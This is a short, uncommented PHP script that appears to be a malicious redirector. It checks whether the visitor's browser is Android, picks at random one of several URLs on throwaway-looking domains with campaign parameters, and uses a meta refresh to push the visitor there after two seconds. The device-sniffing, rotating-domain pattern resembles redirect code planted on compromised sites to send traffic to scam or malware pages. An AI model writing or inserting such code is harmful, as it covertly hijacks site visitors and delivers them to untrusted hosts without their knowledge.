<?php

$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$android_urls = array (
			'http://com-r81.net/paro.php?a=314759&c=wl_con&s=23AND',
			'http://com-5fy.net/ziw.php?a=314759&c=wl_con&s=23AND',
			'http://com-3w1.net/sdg.php?a=314759&c=wl_con&s=23AND',
);
$not_android_urls = array (
			'http://com-r81.net/ciod.php?a=314759&c=wl_con&s=23YP',
			'http://com-5fy.net/wws.php?a=314759&c=wl_con&s=23YP',
			'http://com-3w1.net/mwzs.php?a=314759&c=wl_con&s=23YP',
);
 $n = mt_rand(0,count($not_android_urls)-1);
 $rand_url=$not_android_urls[$n];
 
if ( $android  == true)
{
 $n = mt_rand(0,count($android_urls)-1);
 $rand_url=$android_urls[$n];
}
?>
 <meta http-equiv="refresh" content="2; url=<?php echo $rand_url;?> ">